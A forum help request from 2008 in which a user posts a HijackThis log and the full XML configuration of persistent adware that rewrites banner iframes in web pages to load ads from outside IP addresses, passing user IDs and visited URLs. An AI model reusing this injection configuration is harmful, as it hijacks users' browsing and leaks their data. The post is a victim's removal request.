[x]
Posted via EE Mobile

Search, ask, and monitor your questions on the go with EE Mobile. Visit Experts Exchange from your mobile device and never be out of touch again.
01/27/2008 at 01:31PM PST, ID: 23115046
[x]
Attachment Details
[x]
The Solution Rating System

With so many solutions, how can you tell which solutions are most likely to help you and which ones are not? To provide you with a tool to use, we rate our solutions based on various elements that most accurately determine if a solution is a quality solution. To explain what factors affect the solution rating, here are the elements we take into consideration when formulating our solution rating.

  • The Grade of the Solution
  • The Zone Rank of the Expert Providing the Solution
  • The Number of Author and Expert Comments
  • The Number of Experts Contributing
  • The Feedback of the Community

Your Input Matters
Because of the way the system is set up, the most important variable in this equation is you. As a member of Experts Exchange, you are able to cast your vote on the quality of the solutions in regard to how complete, accurate, helpful and easy to understand each solution is. When you provide your feedback, each rating is adjusted accordingly. So, if you see a solution that has a poor rating that you think is a good solution, let us know by rating it. As you do, the rating will be adjusted and will become more accurate for other members of our site.

If you have any suggestions that you would like to make for our rating system, please ask a question in the Suggestions Zone of Community Support.

Thank you!
4.2

Help me remove persistent malware

Asked by steve0412 in HijackThis Software, Windows XP Operating System, Anti-Spyware

Hi

I have a problem with a PC in that some malware seems to get half removed by McAfee, which leaves the web pages incompletely loaded. Ok, I have solved that by using Opera BUT, I cannot get rid of this pest. I use McAfee, Spy Hunterm Uniblue Spy Eraser and RogueRemover pro-nothing will shift this.

It starts with an XML page that regenerates itself when removed.(see end of this question for the content). This appears in the HKLM Run section, to run Rundll32.exe (from the system32 directory via prefetching commands) This in turn runs a dll, which is in the system32 directory. This malware even logs on as another user (I have since changed the log on to a guest and with password control to try and prevent this).

Hre is the HijackThis log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 22:26:24, on 27-01-2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16574)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Programmer\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Programmer\McAfee\MSK\MskSrver.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Programmer\SiteAdvisor\6253\SAService.exe
C:\WINDOWS\system32\svchost.exe
C:\Programmer\McAfee\MSK\MskAgent.exe
C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
C:\WINDOWS\StartupMonitor.exe
C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
C:\Programmer\McAfee\MPS\mpsevh.exe
C:\Programmer\HP\Digital Imaging\bin\hpqimzone.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
C:\WINDOWS\System32\alg.exe
C:\Programmer\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Programmer\HP\Digital Imaging\Product Assistant\bin\hprblog.exe
C:\Documents and Settings\Anne\Skrivebord\Startup.exe
C:\WINDOWS\system32\HPZinw12.exe
C:\WINDOWS\regedit.exe
C:\Documents and Settings\Anne\Skrivebord\HiJackThis.exe
C:\PROGRAM FILES\PROCESS EXPLORER\PROCEXP.EXE
C:\WINDOWS\explorer.exe
C:\Programmer\Opera\Opera.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://dellsearchedit.myway.com/samisc/dellsidebar.jhtml?p=DJ
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.epilepsiforeningen.dk/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O3 - Toolbar: McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Programmer\SiteAdvisor\6253\SiteAdv.dll
O4 - HKLM\..\Run: [DLA] C:\WINDOWS\System32\DLA\DLACTRLW.EXE
O4 - HKLM\..\Run: [MskAgentexe] C:\Programmer\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [SiteAdvisor] C:\Programmer\SiteAdvisor\6253\SiteAdv.exe
O4 - HKLM\..\Run: [Run StartupMonitor] StartupMonitor.exe
O4 - HKLM\..\Run: [Spyhunter Security Suite] "C:\Programmer\Enigma Software Group\SpyHunter\SpyHunter3.exe" -minimized
O4 - HKLM\..\Run: [BM870dc8a8] Rundll32.exe "C:\WINDOWS\system32\sslnpilc.dll",s
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOKAL TJENESTE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETVÆRKSTJENESTE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Programmer\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Image Zone Hurtig start.lnk = C:\Programmer\HP\Digital Imaging\bin\hpqthb08.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Send til &Bluetooth-enhed... - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
O9 - Extra button: FirstClass® - {02011FE3-C22B-451d-9A25-BF4DBB38B8E7} - C:\WINDOWS\Downloaded Program Files\fcplugin.dll
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: @btrez.dll,-4015 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra 'Tools' menuitem: @btrez.dll,-12650 - {CCA281CA-C863-46ef-9331-5C8D4460577F} - C:\Programmer\WIDCOMM\Bluetooth Software\btsendto_ie.htm
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {11818680-FCF6-11D0-9808-0800092A4865} (Adobe Form Control) - http://www.kps.dk/Codebase/FormCtl.cab
O16 - DPF: {1469FF24-47F6-11D2-8805-006008C537E3} (Adobe Mail Control) - http://www.kps.dk/codebase/ffmail.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201280089546
O16 - DPF: {9C196458-4145-46AF-8A77-1506878DFECA} (FirstClass® Control) - ftp://ftp.sektornet.dk/sektornet/skolekom/fcplugin.cab
O16 - DPF: {CDDCFBB3-4D93-11D2-B1A9-00A0C9B742BE} (Adobe Script Object) - http://www.kps.dk/codebase/scriptobject.cab
O16 - DPF: {D8575CE3-3432-4540-88A9-85A1325D3375} (e-Safekey) - https://netbank.danskebank.dk/html/activex/e-Safekey/DB/e-Safekey.cab
O23 - Service: Bluetooth Service (btwdins) - Broadcom Corporation. - C:\Programmer\WIDCOMM\Bluetooth Software\bin\btwdins.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\FÆLLES~1\McAfee\EmProxy\emproxy.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmer\Fælles filer\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Programmer\iPod\bin\iPodService.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Programmer\Fælles filer\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\programmer\fælles filer\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\FÆLLES~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Programmer\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Programmer\McAfee\MSK\MskSrver.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Programmer\Intel\PROSetWired\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SiteAdvisor-tjeneste (SiteAdvisor Service) - Unknown owner - C:\Programmer\SiteAdvisor\6253\SAService.exe

--
End of file - 8833 bytes


(See the HKLM entry for BM870dc8a8)

BM870dc8a8 is this:

<ROOT><CAMPAIGNLIST><CAMPAIGN name="120x240" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?240['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x240;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ae4390b5' name='ae4390b5' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x240&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='240'><a href='http://85.12.43.83/www/delivery/ck.php?n=ad03d9ca' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=35&n=ad03d9ca' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x600" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a57232fb' name='a57232fb' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='600'><a href='http://85.12.43.83/www/delivery/ck.php?n=a2d7629e' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=36&n=a2d7629e' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="120x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?120['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=120x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8c6b7cd' name='a8c6b7cd' src='http://85.17.166.173/go/?cmp=nm_bm3s_120x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='120' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a0118327' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=37&n=a0118327' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="125x125" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?((WIDTH=['"]?125['"]?)|(HEIGHT=['"]?125['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=125x125;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a6ea2661' name='a6ea2661' src='http://85.17.166.173/go/?cmp=nm_bm3s_125x125&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='125' height='125'><a href='http://85.12.43.83/www/delivery/ck.php?n=afe4b666' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=38&n=afe4b666' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="160x600" id="20080124"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?((WIDTH=['"]?160['"]?)|(HEIGHT=['"]?600['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=160x600;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a8a9405d' name='a8a9405d' src='http://85.17.166.173/go/?cmp=nm_bm3s_160x600&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='160' height='600'></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="180x150" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?((WIDTH=['"]?180['"]?)|(HEIGHT=['"]?150['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=180x150;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aa44b86f' name='aa44b86f' src='http://85.17.166.173/go/?cmp=nm_bm3s_180x150&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='180' height='150'><a href='http://85.12.43.83/www/delivery/ck.php?n=a935a5aa' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=39&n=a935a5aa' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="234x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?234['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=234x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a80f0628' name='a80f0628' src='http://85.17.166.173/go/?cmp=nm_bm3s_234x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='234' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=a61ab872' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=40&n=a61ab872' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="240x400" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?((WIDTH=['"]?240['"]?)|(HEIGHT=['"]?400['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=240x400;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a4da5d34' name='a4da5d34' src='http://85.17.166.173/go/?cmp=nm_bm3s_240x400&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='240' height='400'><a href='http://85.12.43.83/www/delivery/ck.php?n=a424da19' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=41&n=a424da19' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="250x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?250['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=250x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='ad90e55d' name='ad90e55d' src='http://85.17.166.173/go/?cmp=nm_bm3s_250x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='250' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=ac032ecf' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=42&n=ac032ecf' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x100" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?100['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x100;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1111aad' name='a1111aad' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x100&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='100'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8b2301d' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=43&n=a8b2301d' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="300x250" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?((WIDTH=['"]?300['"]?)|(HEIGHT=['"]?250['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=300x250;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a7b91358' name='a7b91358' src='http://85.17.166.173/go/?cmp=nm_bm3s_300x250&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='300' height='250'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa619a73' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=44&n=aa619a73' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="336x280" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?((WIDTH=['"]?336['"]?)|(HEIGHT=['"]?280['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=336x280;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a1e38bd4' name='a1e38bd4' src='http://85.17.166.173/go/?cmp=nm_bm3s_336x280&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='336' height='280'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa2664b8' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=45&n=aa2664b8' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="468x60" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?((WIDTH=['"]?468['"]?)|(HEIGHT=['"]?60['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=468x60;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='a24b320b' name='a24b320b' src='http://85.17.166.173/go/?cmp=nm_bm3s_468x60&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='468' height='60'><a href='http://85.12.43.83/www/delivery/ck.php?n=aa173903' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=46&n=aa173903' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="720x300" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?((WIDTH=['"]?720['"]?)|(HEIGHT=['"]?300['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=720x300;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aaf81f87' name='aaf81f87' src='http://85.17.166.173/go/?cmp=nm_bm3s_720x300&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='720' height='300'><a href='http://85.12.43.83/www/delivery/ck.php?n=afb3d0f9' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=47&n=afb3d0f9' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN><CAMPAIGN name="728x90" id="20080117"><options><option name="count" value="1000"/><option name="interval" value="1"/></options><commands><command name="code_modify"><actions><action name="replace"><initial_values><initial_value><![CDATA[<IFRAME[^>]*((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?((WIDTH=['"]?728['"]?)|(HEIGHT=['"]?90['"]?))+[^>]*?>.*?</IFRAME>]]></initial_value><initial_value><![CDATA[<IFRAME[^>]*src=["']?[^"']+;sz=728x90;.*?</IFRAME>]]></initial_value></initial_values><new_values><new_value id="1" weight="100"><![CDATA[<iframe id='aff78e03' name='aff78e03' src='http://85.17.166.173/go/?cmp=nm_bm3s_728x90&uid=[uid]&guid=[guid]&aid=[aid]&url=[url]' framespacing='0' frameborder='no' scrolling='no' width='728' height='90'><a href='http://85.12.43.83/www/delivery/ck.php?n=a8ac5ed4' target='_blank'><img src='http://85.12.43.83/www/delivery/avw.php?zoneid=48&n=a8ac5ed4' border='0' alt='' /></a></iframe>]]></new_value></new_values></action></actions></command></commands><internal_state><current_match_count value="0"/><last_match_time value="0"/></internal_state></CAMPAIGN></CAMPAIGNLIST><COOKIES><COOKIE>ip=ODcuNjAuOTYuOTA#</COOKIE><COOKIE>country=REs#</COOKIE><COOKIE>network=Ym0#</COOKIE></COOKIES></ROOT>

Has anyone got ANY idea how to remove the mechanism that regenerates this pest? The IP address resolves to Breda in Holland.
[+][-]01/27/08 01:37 PM, ID: 20755344

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/27/08 01:49 PM, ID: 20755379

View this solution now by starting your 30-day free trial. Setting up your free trial is quick, easy, and secure. We will return you to this solution, unlocked, when you're done.

 

About this solution

